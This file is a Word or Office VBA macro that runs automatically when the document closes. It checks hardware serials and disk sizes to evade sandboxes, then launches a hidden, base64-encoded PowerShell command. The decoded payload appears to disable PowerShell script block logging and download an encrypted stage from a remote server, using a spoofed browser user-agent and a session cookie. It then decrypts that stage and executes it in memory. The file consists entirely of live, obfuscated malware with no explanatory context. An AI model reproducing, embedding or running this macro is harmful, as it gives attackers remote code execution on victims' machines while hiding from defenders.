Sub AutoClose()
	tYadbkWDsiKe
End Sub

Public Function tYadbkWDsiKe() As Variant
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
	Set ID = objWMIService.ExecQuery("Select IdentifyingNumber from Win32_ComputerSystemproduct")
	For Each objItem In ID
		If StrComp(objItem.IdentifyingNumber, "2UA20511KN") = 0 Then End
	Next
	Set disksize = objWMIService.ExecQuery("Select Size from Win32_logicaldisk")
	For Each objItem In disksize
		If (objItem.Size = 42949603328#) Then End
		If (objItem.Size = 68719443968#) Then End
	Next
	Dim nwGftwHwQCbVBpWUx As String
	nwGftwHwQCbVBpWUx = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABHAH"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "IAbwB1AHAAUABvAGwAaQBjAHkARgBpAGUAbABkACAAPQAgAFsA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "cgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQ"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBl"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAH"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "MAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBjAGEAYwBoAGUA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "ZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BzACcALAAgACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AGkAYwAnACkAOwBJAGYAIAAoACQARwByAG8AdQBwAFAAbwBsAG"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "kAYwB5AEYAaQBlAGwAZAApACAAewAkAEcAcgBvAHUAcABQAG8A"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "bABpAGMAeQBDAGEAYwBoAGUAIAA9ACAAJABHAHIAbwB1AHAAUA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BvAGwAaQBjAHkARgBpAGUAbABkAC4ARwBlAHQAVgBhAGwAdQBl"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "ACgAJABuAHUAbABsACkAOwBJAGYAIAAoACQARwByAG8AdQBwAF"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AAbwBsAGkAYwB5AEMAYQBjAGgAZQBbACcAUwBjAHIAaQBwAHQA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "QgBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAIAB7ACQARw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "ByAG8AdQBwAFAAbwBsAGkAYwB5AEMAYQBjAGgAZQBbACcAUwBj"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AHIAaQBwAHQAQgBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "TABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwByAG8AdQ"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BwAFAAbwBsAGkAYwB5AEMAYQBjAGgAZQBbACcAUwBjAHIAaQBw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AHQAQgBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "bwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AwADsAfQAkAHYAYQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBD"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AG8AbABsAGUAYwB0AGkAbwBuAHMALgBHAGUAbgBlAHIAaQBjAC"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "4ARABpAGMAdABpAG8AbgBhAHIAeQBbAHMAdAByAGkAbgBnACwA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "UwB5AHMAdABlAG0ALgBPAGIAagBlAGMAdABdAF0AOgA6AG4AZQ"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "B3ACgAKQA7ACQAdgBhAGwALgBBAGQAZAAoACcARQBuAGEAYgBs"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEwAbwBnAGcAaQBuAG"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "cAJwAsACAAMAApADsAJAB2AGEAbAAuAEEAZABkACgAJwBFAG4A"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "YQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAgADAAKQA7"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "ACQARwByAG8AdQBwAFAAbwBsAGkAYwB5AEMAYQBjAGgAZQBbAC"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "cASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "XABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQ"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgBsAG"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACAAPQAgACQAdgBhAGwA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "fQA7AH0AOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcg"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "B2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AEUAeABwAGUAYwB0ADEAMAAwAEMAbwBuAHQAaQBuAHUAZQA9AD"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "bgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BCAHkAdABlAHMAKAAnAEkAdgBWAF4AWQA6AEYAdABmAEMAWABU"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "ACwAPQBhAEEATQA/AGoAIwA3AE8AUQBwAF0AJgByAHwAWwBaAH"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "gAbgAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "cwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBb"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "ACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7AC"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "QAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "XQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABT"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAF"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "MAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0A"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "OwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwA9"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHMAZQByAD0A"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "JAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOg"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABb"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlAD"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "YANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "QQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQ"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAGcAQQB4AEEAQwA0"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AEEATQBRAEEAeQBBAEQAZwBBAE8AZwBBADQAQQBEAEEAQQAnAC"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "kAKQApADsAJAB0AD0AJwAvAGMAdgBjAG4AbwB5AHEAYQAvACcA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "OwAkAHcAYwAuAFAAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALg"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABl"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AGYAYQB1AGwAdABXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAF"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0A"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "IABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbg"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "B0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzAD"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "sAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "YwAuAFAAcgBvAHgAeQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AuAEEAZABkACgAIgBVAHMAZQByAC0AQQBnAGUAbgB0ACIALAAi"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAH"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "cAcwAgAE4AVAAgADYALgAzADsAIABXAGkAbgA2ADQAOwAgAHgA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "NgA0ACkAIABBAHAAcABsAGUAVwBlAGIASwBpAHQALwA1ADMANw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AuADMANgAgACgASwBIAFQATQBMACwAIABsAGkAawBlACAARwBl"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AGMAawBvACkAIABDAGgAcgBvAG0AZQAvADcAOQAuADAALgAzAD"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "kANAA1AC4AOAA4ACAAUwBhAGYAYQByAGkALwA1ADMANwAuADMA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "NgAiACkAOwB0AHIAeQB7ACQAaQBnAD0AJAB3AGMALgBEAG8Adw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKQB9AGMAYQB0"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AGMAaAB7AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAG"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "QAZAAoACIASABvAHMAdAAiACwAIgB3AG0AdwBpAGYAYgBhAGoA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "eAB4AGIAYwB4AG0AdQBjAHgAbQBsAGMALgBjAG8AbQAiACkAOw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBv"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AHAAUQA3AG"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "YAVwBjADgAdwBCAFUAQQBLAEgAbgBlAG0AcABuAFIAWQB2ADMA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "QwBzAG4AQgBZACUAMwBEACIAKQA7ACQAZABhAHQAYQA9ACQAdw"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BjAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHMAZQBy"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "ACsAJAB0ACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbADAALgAuAD"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "MAXQA7ACQAZABhAHQAYQA9ACQAZABhAHQAYQBbADQALgAuACgA"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "JABkAGEAdABhAC4AbABlAG4AZwB0AGgALQAxACkAXQA7AC0Aag"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "BvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABk"
	nwGftwHwQCbVBpWUx = nwGftwHwQCbVBpWUx + "AGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA="
	Set asd = CreateObject("WScript.Shell")
	asd.Run(nwGftwHwQCbVBpWUx)
End Function
